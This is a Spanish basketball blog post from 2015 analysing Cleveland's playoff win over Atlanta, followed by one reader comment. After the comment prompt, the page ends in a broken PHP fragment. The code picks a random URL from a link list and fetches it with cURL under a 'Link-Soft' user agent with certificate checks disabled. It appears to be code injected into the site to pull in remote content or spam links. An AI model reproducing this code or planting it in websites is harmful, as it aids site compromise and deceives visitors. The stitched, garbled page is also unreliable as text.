La Crónica: Mal de altura

23 de May de 2015 por TheDeerHunter

La gran defensa de los Cavs no explica del todo el colapso sufrido por un quinteto con cuatro all-stars. No alcanza a justificar la inoperancia en el lanzamiento exterior de un equipo que en la regular se movía en torno a un 40% de acierto. El movimiento de balón del equipo de Blatt no es tan bueno como para facilitar tanto los tiros a cañoneros de la talla de Iman Shumpert…

Los Hawks llevan un tiempo estancados en la mediocridad. El chute moral de alcanzar las cotas más altas de la franquicia desde tiempos inmemoriales no ha compensado el bajón físico y mental que arrastran. Más bien al contrario, acusan una situación que no están acostumbrados a manejar. Resulta casi inexplicable un nivel de desacierto tan acusado después de las fases de brillantez que nos habían mostrado. Esta circunstancia recuerda mucho a los Pacers del año pasado y, que se sepa, ahora no hay ningún incidente con ninguna stripper de por medio…

Sin Irving, lo que les falta en efectivos a los Cavs les sobra en determinación y saber estar. Un LeBron al lado genera una confianza contagiosa. No es casualidad lo que decíamos del “conejo saliendo de la chistera” como ayer ocurrió con Shumpert o el sempiterno James Jones. El elegido jugó con la frágil moral rival desde el salto inicial y castigó cada uno de los errores “no forzados” ajenos con máxima eficacia. Otra vez el tiro exterior de sus compañeros causó estragos. El Phillips Arena silenciado, para gozo del mejor jugador de la conferencia y, posiblemente, de la liga.

Habemus finalista.

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    Tremendo el estado de gracia que han alcanzado los Cavaliers,no me esperaba esta superioridad sobre Atlanta,de hecho consideraba favoritos a los Hawks debido a las lesiones de Cleveland,pero impresiona ver el nivel defensivo y el acierto de los secundarios de LeBron.El 23,por cierto,asistiendo o anotando en 60 de los 94 puntos anotados anoche.Una crisis muy grave tiene que ocurrir para que Cleveland no llegue a la final.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>